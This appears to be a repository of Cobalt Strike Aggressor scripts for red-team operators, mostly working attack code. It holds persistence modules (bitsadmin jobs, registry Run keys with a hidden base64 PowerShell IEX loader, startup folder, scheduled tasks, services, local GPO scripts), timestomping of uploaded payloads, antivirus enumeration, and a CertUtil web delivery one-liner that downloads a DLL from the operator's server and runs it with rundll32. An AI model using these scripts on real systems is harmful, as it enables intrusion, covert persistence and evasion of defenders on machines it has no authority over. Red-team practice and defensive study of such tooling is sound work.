├── All_In_One.cna
├── Logging
├── README.md
├── logs.py
├── Logger.cna
└── av_hips_executables.txt
├── DriverSearcher
├── EDRQuery.sln
└── DriverSearcher
│ ├── Properties
│ └── AssemblyInfo.cs
│ ├── EDRQuery.csproj
│ └── Program.cs
├── Persistence
├── Bitsadmin.cna
├── RegistryPersist.cna
├── StartUpFolderPersist.cna
├── UserSchtasksPersist.cna
├── ServiceEXEPersist.cna
├── StartupGPOPersist.cna
├── HKLMRunKeyPSRegistryPersist.cna
├── HKCURunKeyPSRegistryPersist.cna
├── README.md
├── WMICEventPersist.cna
├── WMIEventPersist.cna
└── Persistence_Menu.cna
├── ProcessMonitor.ps1
├── README.md
├── AVQuery.cna
├── CertUtilWebDelivery.cna
├── ArtifactPayloadGenerator.cna
├── logvis.cna
├── ProcessMonitor.cna
├── SMBPayloadGenerator.cna
├── RedTeamRepo.cna
├── EDR.cna
└── ProcessColor.cna
/All_In_One.cna:
--------------------------------------------------------------------------------
1 | Remaking this completely. Keep an eye out for a version 2 release :)
2 |
--------------------------------------------------------------------------------
/Logging/README.md:
--------------------------------------------------------------------------------
1 | # Logging Scripts
2 |
3 | **Logger.cna Dependencies:**
4 |
5 | Parent Folder:
6 | /opt/cobaltstrike/Logger.cna
7 | /opt/cobaltstrike/av_hips_executables.txt
8 | /opt/cobaltstrike/logs.py
9 |
10 | * logs.py
11 |
12 | * Author: Matthew Merrill @merrillmatt011
13 |
14 | * Python Script to parse all cobalt input/output logs and export into a HTML document
15 |
16 | * *Still in Beta Stage
17 |
18 | * Syntax: ./logs.py [Teamserver NickName]
19 |
20 | * Logger.cna
21 |
22 | * Logging script that captures all the Beacon outputs. Formats the Beacon input line to display timestamps. Use with logs.py to export all the logs for each operator.
23 | * All logs will be created inside the /opt/cobaltstrike/logs/ directory
24 |
25 | 
26 | 
27 |
--------------------------------------------------------------------------------
/DriverSearcher/EDRQuery.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.26730.16
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "EDRQuery", "DriverSearcher\EDRQuery.csproj", "{AFD1FF09-2632-4087-A30C-43591F32E4E8}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {AFD1FF09-2632-4087-A30C-43591F32E4E8}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {AFD1FF09-2632-4087-A30C-43591F32E4E8}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {AFD1FF09-2632-4087-A30C-43591F32E4E8}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {AFD1FF09-2632-4087-A30C-43591F32E4E8}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {4062063D-7FA2-41F1-AFAA-C9AB9D75A88F}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/Persistence/Bitsadmin.cna:
--------------------------------------------------------------------------------
1 | #Bitsadmin Persistence
2 | #Author: @r3dQu1nn
3 | #Creates a bitsadmin job for Persistence
4 | #Credit to: https://twitter.com/Moriarty_Meng/status/993861660405215232
5 |
6 | sub persistbits {
7 | $bid = $1;
8 | $dialog = dialog("Bitsadmin Persistence", %(jobname => "", exe => ""), &bitsadmin);
9 | dialog_description($dialog, "Creates a bitsadmin job to execute as your current user context. This job will be executed every time the user logs in. Currently only works on Windows 7, 8, Server 2008, Server 2012.");
10 |
11 | drow_text($dialog, "jobname", "Name for bitsadmin job:");
12 | drow_text($dialog, "exe", "Payload Executable (Use full path):");
13 |
14 | dbutton_action($dialog, "Create");
15 | dialog_show($dialog);
16 |
17 | }
18 |
19 | sub bitsadmin {
20 | blog($bid, "Installing bitsadmin Persistence as ".$3["jobname"]."..");
21 | bpowerpick!($bid, 'bitsadmin /rawreturn /create '.$3['jobname'].'');
22 | bpowerpick!($bid, 'bitsadmin /rawreturn /addfile '.$3['jobname'].' C:\\Windows\\System32\\user32.dll C:\\Users\\Public\\Documents\\user32.gif');
23 | bpowerpick!($bid, 'bitsadmin /rawreturn /setnotifycmdline '.$3['jobname'].' '.$3['exe'].' NULL');
24 | bpowerpick!($bid, 'bitsadmin /rawreturn /setpriority '.$3['jobname'].' high');
25 | bpowerpick!($bid, 'bitsadmin /rawreturn /resume '.$3['jobname'].'');
26 | }
27 |
28 | popup beacon_bottom {
29 | item "Bitsadmin Persistence" {
30 | persistbits($1);
31 | }
32 | }
33 |
--------------------------------------------------------------------------------
/ProcessMonitor.ps1:
--------------------------------------------------------------------------------
1 | function Get-Proc {
2 | <#
3 | .DESCRIPTION
4 | Cobaltstrike has a great general function for processes: the 'ps' command. Use that if you need to dump ALL the processes w/ arch.
5 |
6 | This solution will show the running processes that have a creation date within the past 1 hour, giving more SA to the operator/analyst than just looking through an entire process list
7 |
8 | Both solutions have their place. It is up to you to know how to use which when you need it.
9 |
10 | Module info for process list has also been removed because nobody used it in the two years that the survey script was around. If you need to do IR on a box, there are better ways to do so
11 | than by clogging up the screen in a survey.
12 | #>
13 |
14 | param
15 | (
16 | [Parameter(Mandatory = $True)]
17 | [string]$Time
18 | )
19 |
20 | $test3 = gwmi win32_process | sort -Property ProcessID
21 | $q = get-date
22 |
23 | "`n[+] Processes created in the past $Time minutes`n"
24 | "{0,-8}{1,-8}{2,-20} {3,-20} {4}" -f "PID","PPID","PID Name","PPID Name","Owner"
25 |
26 | foreach ($i in $test3){
27 | $qq = [Management.ManagementDateTimeConverter]::ToDateTime($i.creationdate)
28 | if ($qq -gt $q.addminutes(-$Time)){
29 | $z = $i.ParentProcessId
30 | "{0,-8}{1,-8}{2,-20} {3,-20} {4}" -f $i.ProcessId, $i.ParentProcessId, $( if($i.processname.length -gt 20){ $i.processname.substring(0,20)} else{$i.processname}), $($test3 | where {$_.processid -eq $z}).caption , $i.GetOwner().user
31 | }
32 | }
33 | }
--------------------------------------------------------------------------------
/Persistence/RegistryPersist.cna:
--------------------------------------------------------------------------------
1 | #Registry Persistence
2 | #Author: @r3dQu1nn
3 | #Depending on Registry Location elevated access might be required
4 |
5 | sub persistRegistry {
6 | $bid = $1;
7 | $dialog = dialog("Registry Persistence", %(reglocation => "Registry Location..", keyname => "Key Name..", datatype => "Data Type..(REG_SZ)", keyvalue => "Key Value..(Payload)"), lambda({
8 | if ("$3['reglocation']" ismatch 'Registry Location..' || "$3['keyname']" ismatch 'Key Name..' || "$3['datatype']" ismatch 'Data Type..(REG_SZ)' || "$3['keyvalue']" ismatch 'Key Value..(Payload)') {
9 | berror($bid, "\c4Please enter a valid Registry Location, Key Name, Key Type, and a valid Payload Location.");
10 | break;
11 | }
12 | else {
13 | bpowerpick($bid, 'reg add "'.$3['reglocation'].'" /v "'.$3['keyname'].'" /t "'.$3['datatype'].'" /d "'.$3['keyvalue'].'" /f');
14 | bpowerpick($bid, 'reg query "'.$3['reglocation'].'"');
15 | }
16 | }));
17 |
18 | dialog_description($dialog, "Registry Persistence - Creates a custom Registry Entry for persistence on selected beacon. **HKLM\\ could require elevated access.");
19 |
20 | drow_text($dialog, "reglocation", "Registry Location:");
21 | drow_text($dialog, "keyname", "Registry Key Name:");
22 | drow_text($dialog, "datatype", "Registry Key Type:");
23 | drow_text($dialog, "keyvalue", "Registry Key Value..(Payload Location):");
24 |
25 | dbutton_action($dialog, "Create");
26 | dialog_show($dialog);
27 |
28 | }
29 |
30 | popup beacon_bottom {
31 | item "Registry Persistence" {
32 | persistRegistry($1);
33 | }
34 | }
35 |
--------------------------------------------------------------------------------
/Persistence/StartUpFolderPersist.cna:
--------------------------------------------------------------------------------
1 | #StartUpFolder Persistence
2 | #Author: @r3dQu1nn
3 | #Quick and easy persistence via a StartUpFolder
4 | #Windows will have different StartUp locations dependent upon the version of the OS
5 |
6 | sub persistThroughStartUpFolder {
7 | $bid = $1;
8 | $dialog = dialog("Start Up Folder Persistence", %(startup => "Startup Directory Folder..", payload => "Select Payload.."), lambda({
9 | if ("$3['startup']" ismatch 'Startup Directory Folder..' || "$3['payload']" ismatch 'Select Payload..') {
10 | berror($bid, "\c4Please enter a valid Startup Directory Folder, and select a Payload.");
11 | break;
12 | }
13 | else {
14 | bpowerpick($bid, 'cd "'.$3['startup'].'"');
15 | bupload($bid, $3['payload']);
16 | btimestomp($bid, "$3['payload']", "c:\\windows\\system32\\calc.exe");
17 | }
18 | }));
19 | dialog_description($dialog, "Start Up Folder Persistence - Generates a Startup Folder Entry and places a payload inside that folder. **Windows NT 6.0-10.0/All Users Location - %SystemDrive%\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup | Windows NT 6.0-10.0/Current User Location %SystemDrive%\\Users\\%UserName%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup");
20 |
21 | drow_text($dialog, "startup", "StartUp Directory Folder Location:");
22 | drow_file($dialog, "payload", "Select Payload:");
23 |
24 | dbutton_action($dialog, "Create");
25 | dialog_show($dialog);
26 | }
27 |
28 | popup beacon_bottom {
29 | item "Windows StartUp Folder Persistence" {
30 | persistThroughStartUpFolder($1);
31 | }
32 | }
33 |
--------------------------------------------------------------------------------
/DriverSearcher/DriverSearcher/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("DriverSearcher")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("DriverSearcher")]
13 | [assembly: AssemblyCopyright("Copyright © 2018")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("afd1ff09-2632-4087-a30c-43591f32e4e8")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/Persistence/UserSchtasksPersist.cna:
--------------------------------------------------------------------------------
1 | #User Schtasks Persistence
2 | #Author: @r3dQu1nn
3 | #Runs as current user for the selected beacon
4 | #Meant for quick user level persistence upon initial access
5 | #Thanks to @noone and bluescreenofjeff for help
6 |
7 | sub persistUserSchtasks {
8 | $bid = $1;
9 | $dialog = dialog("User Schtasks Persistence", %(taskname => "Evil Task Name..", targetpath => "Target Path..", user => "User to Run as..", schedule => "Schedule modifier..", payloadfile => "Select DLL Payload.."), lambda({
10 | if ("$3['taskname']" ismatch 'Evil Task Name..' || "$3['targetpath']" ismatch 'Target Path..' || "$3['payloadfile']" ismatch 'Select DLL Payload..' || "$3['user']" ismatch 'User to Run as..' || "$3['schedule']" ismatch 'Schedule modifier..') {
11 | berror($bid, "\c4Please enter a valid Task Name, Target Path, Schedule Modifier, and a valid Payload File.");
12 | break;
13 | }
14 | else {
15 | bcd($bid, $3['targetpath']);
16 | bupload($bid, $3['payloadfile']);
17 | bpowerpick($bid, 'schtasks /create /tn "'.$3['taskname'].'" /tr "C:\Windows\System32\rundll32.exe '.$3['targetpath']."\\".split("/",$3['payloadfile'])[-1].',StartW" /ru "'.$3['user'].'" /sc "'.$3['schedule'].'"');
18 | bpowerpick($bid, 'schtasks /query /v /tn "'.$3['taskname'].'" /FO list');
19 | }
20 | }));
21 |
22 | dialog_description($dialog, "User Schtasks Persistence - Generates a schtask for persistence on selected beacon.");
23 |
24 | drow_text($dialog, "taskname", "Schtasks Taskname:");
25 | drow_text($dialog, "user", "User to Run as:");
26 | drow_text($dialog, "targetpath", "Target Path:");
27 | drow_text($dialog, "schedule", "Schedule Modifier:");
28 | drow_file($dialog, "payloadfile", "DLL Payload:");
29 |
30 | dbutton_action($dialog, "Create");
31 | dialog_show($dialog);
32 |
33 | }
34 |
35 | popup beacon_bottom {
36 | item "User Schtasks Persistence" {
37 | persistUserSchtasks($1);
38 | }
39 | }
40 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Aggressor Scripts
2 | Collection of Aggressor scripts for Cobalt Strike 3.0+ pulled from multiple sources
3 | * All_In_One.cna v1 - Removed and outdated
4 |
5 | * All purpose script to enhance the user's experience with cobaltstrike. Custom menu creation, Logging, Persistence, Enumeration, and 3rd party script integration.
6 | * Version 2 is currently in development!
7 |
8 | * ArtifactPayloadGenerator.cna
9 |
10 | * Generates every type of Stageless/Staged Payload based off a HTTP/HTTPS Listener
11 |
12 | * Creates /opt/cobaltstrike/Staged_Payloads, /opt/cobaltstrike/Stageless_Payloads
13 |
14 | * AVQuery.cna
15 |
16 | * Queries the Registry with powershell for all AV Installed on the target
17 |
18 | * Quick and easy way to get the AV you are dealing with as an attacker
19 |
20 | 
21 |
22 | * CertUtilWebDelivery.cna
23 |
24 | * Stageless Web Delivery using CertUtil.exe
25 |
26 | * Powerpick is used to spawn certutil.exe to download the stageless payload on target and execute with rundll32.exe
27 |
28 | 
29 |
30 | * EDR.cna
31 |
32 | * Detects EDR solutions running on local/remote hosts
33 |
34 | * RedTeamRepo.cna
35 |
36 | * A common collection of OS commands, and Red Team Tips for when you have no Google or RTFM on hand.
37 |
38 | * Script will be updated on occasion, feedback and more inputs are welcomed!
39 |
40 | 
41 |
42 | * ProcessColor.cna
43 |
44 | * Color coded process listing without the file requirement.
45 |
46 | * Thanks to @oldb00t for the original version: https://github.com/oldb00t/AggressorScripts/tree/master/Ps-highlight
47 |
48 | 
49 |
50 |
--------------------------------------------------------------------------------
/AVQuery.cna:
--------------------------------------------------------------------------------
1 | #AntiVirus Query
2 | #Author: @r3dQu1nn
3 | #Queries the Registry for AV installed
4 | #Thanks to @i_am_excite and @merrillmatt011 for the help
5 | #Props to @zerosum0x0 for the wmic find!
6 |
7 | #Long ass one-liner :)
8 | $powershellcmd = "\$av_list = @(\"BitDefender\", \"Kaspersky\", \"McAfee\", \"Norton\", \"Avast\", \"WebRoot\", \"AVG\", \"ESET\", \"Malware\", \"Windows Defender\");\$av_install = Get-ItemProperty HKLM:\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\*;\$av_install1 = Get-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\*;\$regkey = 'HKLM:\\SOFTWARE\\Microsoft\\Windows Defender\\Signature Updates\\';\$av_loop2 = foreach (\$av1 in \$av_list){foreach (\$key in \$av_install){if (\$key.DisplayName -match \$av1 -eq \$TRUE){% {\"{0}|{1}|{2}\" -f \$key.DisplayName.ToString(), \$key.DisplayVersion.ToString(), \$key.InstallDate.ToString()}}}};\$proc_temp = Get-Process;\$av_loop = foreach (\$av in \$av_list){foreach (\$zz in \$proc_temp){if (\$zz.path -match \$av -eq \$TRUE){% {\"{0}|{1}|{2}\" -f \$zz.Id.ToString(), \$zz.Name.Split('\"')[0], \$zz.Path.ToString()}}}};\$av_loop3 = foreach (\$av2 in \$av_list){foreach (\$key1 in \$av_install1){if (\$key1.DisplayName -match \$av2 -eq \$TRUE){% {\"{0}|{1}|{2}\" -f \$key1.DisplayName.ToString(), \$key1.DisplayVersion.ToString(), \$key1.InstallDate.ToString()}}}};Write-Output \"`nPID|Name|Path`n\";Write-Output \$av_loop;Write-Output \"`nWindows Defender AV Signature Version:\";(Get-ItemProperty -Path \$regkey).ASSignatureVersion;Write-Output \"`nAV Name|Version|Install Date`n\";Write-Output \$av_loop2;Write-Output \$av_loop3";
9 |
10 | #AV_Query Command Register
11 | beacon_command_register("AV_Query", "Queries the Registry for AV Installed",
12 | "Syntax: AV_Query\n" .
13 | "Checks HKLM hive for All AntiVirus installed");
14 |
15 | #AV_Query alias
16 | alias AV_Query {
17 |
18 | blog($1, "\cBDetermining what AntiVirus is installed...");
19 | bpowerpick!($1, $powershellcmd);
20 | bpause($1, int(30000));
21 | bpowerpick!($1, "Get-WmiObject -Namespace \"root\\SecurityCenter2\" -Query \"SELECT * FROM AntiVirusProduct\" | select-object displayName,pathToSignedReportingExe,timestamp| fl");
22 |
23 | }
24 |
--------------------------------------------------------------------------------
/Persistence/ServiceEXEPersist.cna:
--------------------------------------------------------------------------------
1 | #Admin Level Custom Service EXE Persistence
2 | #Author: @r3dQu1nn
3 | #Runs as elevated user/SYSTEM for the selected beacon
4 |
5 | sub persistCustomService {
6 | $bid = $1;
7 | $dialog = dialog("Admin Level Custom Service EXE Persistence", %(servicename => "Custom Service Name..", display => "Display Name for Custom Service..", description => "Description for Custom Service..", targetpath => "Target Path..", payloadfile => "Select Payload.."), lambda({
8 | if ("$3['servicename']" ismatch 'Custom Service Name..' || "$3['targetpath']" ismatch 'Target Path..' || "$3['display']" ismatch 'Display Name for Custom Service..' || "$3['description']" ismatch 'Description for Custom Service..' || "$3['payloadfile']" ismatch 'Select Payload..') {
9 | berror($bid, "\c4Please enter a valid Custom Service Name, Target Path, Display Name, Description and Payload File.");
10 | break;
11 | }
12 | else {
13 | bcd($bid, $3['targetpath']);
14 | bupload($bid, $3['payloadfile']);
15 | btimestomp($bid, "$3['payloadfile']", "C:\\Windows\\System32\\cmd.exe");
16 | bpowerpick($bid, 'sc delete '.$3['servicename'].'');
17 | bpowerpick($bid, 'sc create '.$3['servicename'].' binpath= "'.$3['targetpath']."\\".split("/",$3['payloadfile'])[-1].'" error= ignore start= auto DisplayName= "'.$3['display'].'"');
18 | bpowerpick($bid, 'sc description '.$3['servicename'].' "'.$3['description'].'"');
19 | bpowerpick($bid, 'sc start '.$3['servicename'].'');
20 | }
21 | }));
22 | dialog_description($dialog, "Generates a Custom Service for Admin Level persistence on selected beacon. **Only Service EXE Payloads should be used**");
23 |
24 | drow_text($dialog, "servicename", "Custom Service Name:");
25 | drow_text($dialog, "display", "Display Name for Custom Service:");
26 | drow_text($dialog, "description", "Description for Custom Service:");
27 | drow_text($dialog, "targetpath", "Target/Bin Path:");
28 | drow_file($dialog, "payloadfile", "Payload:");
29 |
30 | dbutton_action($dialog, "Create");
31 | dialog_show($dialog);
32 |
33 | }
34 |
35 | popup beacon_bottom {
36 | item "Admin Level Custom Service EXE Persistence" {
37 | local ('$bid');
38 | foreach $bid ($1) {
39 | if (-isadmin $bid) {
40 | persistCustomService($bid);
41 | }
42 | else {
43 | berror($1, "\c4Persistence Requires Admin Level Privileges");
44 | }
45 | }
46 | }
47 | }
48 |
--------------------------------------------------------------------------------
/Persistence/StartupGPOPersist.cna:
--------------------------------------------------------------------------------
1 | #Startup Script Local GPO Persistence
2 | #Author: @r3dQu1nn
3 | #Generates a Local GPO Entry in psscripts.ini to call a .ps1 script file for persistence on selected beacon
4 | #Calls back as SYSTEM
5 | #**Check permissions with GPO Enumeration (Successful GroupPolicy Directory Listing) first before executing**
6 | #**Beacon execution will cause winlogon.exe to hang and the end user can't login. Once the new beacon checks in inject into another process and kill the original. Update to come out soon.**
7 | #https://cybersyndicates.com/2016/01/system-context-persistence-in-gpo-startup/
8 |
9 | sub persistStartupGPO {
10 |
11 | $bid = $1;
12 | $dialog = dialog("Startup Script Local GPO Persistence", %(scriptfile => "Select PS1 Script File.."), lambda({
13 | if ("$3['scriptfile']" ismatch 'Select PS1 Script File..') {
14 | berror($bid, "\c4Please enter a valid .ps1 Script File.");
15 | break;
16 | }
17 | else {
18 | bcd($bid, "C:\\");
19 | bupload($bid, $3['scriptfile']);
20 | $handle = openf(">psscripts.ini");
21 | writeb($handle, "[ScriptsConfig]\nStartExecutePSFirst=true\n[Startup]\n0CmdLine=".split("/",$3['scriptfile'])[-1]."\n0Parameters=");
22 | closef($handle);
23 | bpowerpick($bid, 'Move-Item -force -path C:\\'.split("/",$3['scriptfile'])[-1].' -destination C:\\Windows\\System32\\GroupPolicy\\Machine\\Scripts\\Startup\\');
24 | bupload($bid, script_resource("psscripts.ini"));
25 | bpowerpick($bid, 'Remove-Item -Force C:\\Windows\\System32\\GroupPolicy\\Machine\\Scripts\\psscripts.ini');
26 | bpowerpick($bid, 'Move-Item -force -path C:\\psscripts.ini -destination C:\\Windows\\System32\\GroupPolicy\\Machine\\Scripts\\');
27 | bpowerpick($bid, 'gpupdate /force');
28 | }
29 | }));
30 |
31 | dialog_description($dialog, "Startup Script Local GPO Persistence - Generates a Local GPO Entry in psscripts.ini to call a .ps1 script file for persistence on selected beacon. **Check permissions with GPO Enumeration (Successful GroupPolicy Directory Listing) first before executing**");
32 |
33 | drow_file($dialog, "scriptfile", ".ps1 Script File:");
34 |
35 | dbutton_action($dialog, "Create");
36 | dialog_show($dialog);
37 |
38 | }
39 |
40 | popup beacon_bottom {
41 | item "Startup Script Local GPO Persistence" {
42 | local ('$bid');
43 | foreach $bid ($1) {
44 | if (-isadmin $bid) {
45 | persistStartupGPO($bid);
46 | }
47 | else {
48 | berror($1, "\c4Persistence Requires Admin Level Privileges");
49 | }
50 | }
51 | }
52 | }
53 |
--------------------------------------------------------------------------------
/CertUtilWebDelivery.cna:
--------------------------------------------------------------------------------
1 | # CertUtil Scripted Web Delivery (Stageless)
2 | # Author: @r3dQu1nn
3 | # This script is based off the Scripted Web Delivery created by @armitagehacker, <3 raffi!
4 | # https://gist.github.com/rsmudge/629bd4ddce3bbbca1f8c16378a6a419c
5 | # Please be aware of the default values used in the script
6 | # Thanks to @carnal0wnage and @subTee for the discovery of this type of attack
7 | # https://twitter.com/subTee/status/888071631528235010
8 | # http://carnal0wnage.attackresearch.com/2017/08/certutil-for-delivery-of-files.html
9 |
10 | # setup our stageless CertUtil Web Delivery attack
11 | sub stage_attack {
12 | local('%options $script $url $arch');
13 | %options = $3;
14 |
15 | # get the arch right.
16 | $arch = iff(%options["x64"] eq "true", "x64", "x86");
17 |
18 | # generate our stageless CertUtil script. We're going to make *this* function
19 | # the callback for this call. That's why we yield after.
20 | artifact_stageless(%options["listener"], "dll", $arch, $null, $this);
21 | yield;
22 |
23 | # this function is now resumed after &artifact_stageless finished. $1 is our script.
24 | $script = $1;
25 |
26 | # host the script
27 | $url = site_host(%options["host"], %options["port"], %options["uri"], $script, "automatic", "Scripted Web Delivery (CertUtil)");
28 |
29 | # tell the user our URL
30 | prompt_text("Copy/Paste One-liner: ", "powerpick certutil.exe -urlcache -split -f " . $url . " Adobedll.dll; rundll32.exe Adobedll.dll,StartW", {});
31 | show_message("Be aware of the default values in this script and change them! (Adobedll.dll, dll.txt)");
32 | elog("powerpick certutil.exe -urlcache -split -f " . $url . " Adobedll.dll; rundll32.exe Adobedll.dll,StartW");
33 |
34 | }
35 |
36 | # create a popup menu
37 | popup attacks {
38 | item "CertUtil Web Delivery (S)" {
39 | local('$dialog %defaults');
40 |
41 | # setup our defaults
42 | %defaults["uri"] = "/dll.txt";
43 | %defaults["host"] = localip();
44 | %defaults["port"] = 80;
45 |
46 | # create our dialog
47 | $dialog = dialog("CertUtil Web Delivery (Stageless)", %defaults, &stage_attack);
48 | dialog_description($dialog, "A stageless version of the CertUtil Web Delivery attack.");
49 | drow_text($dialog, "uri", "URI Path: ", 20);
50 | drow_text($dialog, "host", "Local Host: ");
51 | drow_text($dialog, "port", "Local Port: ");
52 | drow_listener_stage($dialog, "listener", "Listener: ");
53 | drow_checkbox($dialog, "x64", "x64: ", "Use x64 payload");
54 | dbutton_action($dialog, "Launch");
55 |
56 | # show our dialog
57 | dialog_show($dialog);
58 | }
59 | }
60 |
61 |
--------------------------------------------------------------------------------
/DriverSearcher/DriverSearcher/EDRQuery.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {AFD1FF09-2632-4087-A30C-43591F32E4E8}
8 | WinExe
9 | Properties
10 | EDRQuery
11 | EDRQuery
12 | v3.5
13 | 512
14 |
15 |
16 | AnyCPU
17 | true
18 | full
19 | true
20 | bin\Debug\
21 | DEBUG;TRACE
22 | prompt
23 | 4
24 | true
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
58 |
--------------------------------------------------------------------------------
/Persistence/HKLMRunKeyPSRegistryPersist.cna:
--------------------------------------------------------------------------------
1 | #HKLM Run Key Registry PowerShell Persistence
2 | #Author: @r3dQu1nn
3 | #Generates a powershell Base64 Encoded payload as a HKLM Run Key Registry Entry for persistence on selected beacon based off a HTTP/HTTPS Listener
4 |
5 | sub payloadgenerate {
6 | foreach $name (listeners()) {
7 | $original_listener = $name;
8 | $listener_name = lc($name);
9 | if ($listener_name hasmatch "http" || $listener_name hasmatch "https") {
10 | $data = artifact($original_listener, "powershell");
11 | return base64_encode($data);
12 | }
13 | }
14 | }
15 |
16 | sub persistRegistryHKLM {
17 | $bid = $1;
18 | $dialog = dialog("HKLM Run Key Registry PowerShell Persistence (User Level)", %(keyname => "Key Name for Payload..", keyname1 => "Key Name to execute Payload.."), lambda({
19 | if ("$3['keyname']" ismatch 'Key Name for Payload..' || "$3['keyname1']" ismatch 'Key Name to execute Payload..') {
20 | berror($bid, "\c4Please enter a valid Registry Key Names, Payload, and a valid Path location.");
21 | break;
22 | }
23 | else {
24 | $data = payloadgenerate($bid);
25 | $powershellcmd = "Set-ItemProperty -Path 'HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname']."' -Type String -Value \"".$data."\"";
26 | bpowerpick!($bid, $powershellcmd);
27 | blog($bid, "\cBSetting the first HKLM Run Key Value as '".$3['keyname']."'...");
28 | $powershellcmd1 = "Set-ItemProperty -Path 'HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname1']."' -Value 'C:\\Windows\\SySWoW64\\WindowsPowerShell\\v1.0\\powershell.exe -w hidden -c (IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((gp HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\Run ".$3['keyname'].").".$3['keyname']."))))'";
29 | bpowerpick!($bid, $powershellcmd1);
30 | blog($bid, "\cBSetting the second HKLM Run Key Value as '".$3['keyname1']."'...");
31 | blog($bid, "\cBDisplaying both Run Keys to Verify everything worked as intended...");
32 | $powershellcmd2 = "Get-ItemProperty -Path 'HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname']."'";
33 | bpowerpick!($bid, $powershellcmd2);
34 | $powershellcmd3 = "Get-ItemProperty -Path 'HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname1']."'";
35 | bpowerpick!($bid, $powershellcmd3);
36 | }
37 | }));
38 |
39 | dialog_description($dialog, "HKLM Run Key Registry PowerShell Persistence - Generates a powershell Base64 Encoded payload as a HKLM Run Key Registry Entry for persistence on selected beacon.");
40 |
41 | drow_text($dialog, "keyname", "Registry Key Name for Payload:");
42 | drow_text($dialog, "keyname1", "Registry Key Name to execute Payload:");
43 |
44 | dbutton_action($dialog, "Create");
45 | dialog_show($dialog);
46 |
47 | }
48 |
49 | popup beacon_bottom {
50 | item "HKLM Run Key Registry PowerShell Persistence" {
51 | persistRegistryHKLM($1);
52 | }
53 | }
54 |
--------------------------------------------------------------------------------
/Logging/logs.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | import os
4 | import sys
5 | import datetime
6 |
7 | operator_path = '/opt/cobaltstrike/logs/operator_logs/operator_input/'
8 | beacon_path = '/opt/cobaltstrike/logs/operator_logs/beacon_output/'
9 | args = sys.argv[1:]
10 | num = 0
11 | date_timestamp = str(datetime.datetime.now().strftime("%Y%b%d"))
12 | log_file_path = date_timestamp+"_"+str(" ".join(args))+"_log.html"
13 |
14 | log_file = open(log_file_path,"a+")
15 | log_file.write("""
16 |
17 |
18 |
19 | Logged @ """ + str(datetime.datetime.now().strftime("%Y%b%d %H:%M:%S")) + """
20 |
21 |
22 | | OperatorName |
23 | TargetIP |
24 | TargetHostname |
25 | Username |
26 | ProcessId |
27 | Timestamp |
28 | Command |
29 | LogOutput |
30 |
31 | """)
32 |
33 | for filename in os.listdir(operator_path):
34 | with open(operator_path+filename,"r") as log:
35 | for line in log:
36 | if " ".join(args) in line:
37 | num += 1
38 | cmd_info = line.split(">")[0]
39 |
40 | operator_name = cmd_info.split("[")[0]
41 | ip = str(str(cmd_info.split("[")[1]).split("]")[0]).split("_")[0]
42 | hostname = str(str(cmd_info.split("[")[1]).split("]")[0]).split("_")[1]
43 | user = str(str(cmd_info.split("|")[0]).split("]")[1]).split("/")[0]
44 | pid = str(str(cmd_info.split("|")[0]).split("]")[1]).split("/")[1]
